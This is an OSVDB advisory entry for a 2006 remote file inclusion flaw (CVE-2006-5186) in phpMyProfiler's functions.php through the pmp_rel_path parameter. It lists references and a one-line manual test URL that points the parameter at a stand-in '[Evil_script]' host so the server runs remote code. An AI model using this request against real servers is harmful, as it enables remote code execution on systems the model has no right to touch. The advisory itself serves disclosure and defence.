phpMyProfiler functions.php pmp_rel_path Variable Remote File Inclusion

2006-10-03T06:49:25
ID OSVDB:29492
Type osvdb
Reporter OSVDB
Modified 2006-10-03T06:49:25

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/[path]/functions.php?pmp_rel_path=http://[Evil_script]

References:

Vendor Specific News/Changelog Entry: http://forum.phpmyprofiler.de/viewtopic.php?p=2745#2745 Security Tracker: 1016980 Secunia Advisory ID:22144 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0038.html ISS X-Force ID: 29335 Generic Exploit URL: http://www.milw0rm.com/exploits/2470 FrSIRT Advisory: ADV-2006-3896 CVE-2006-5186 Bugtraq ID: 20324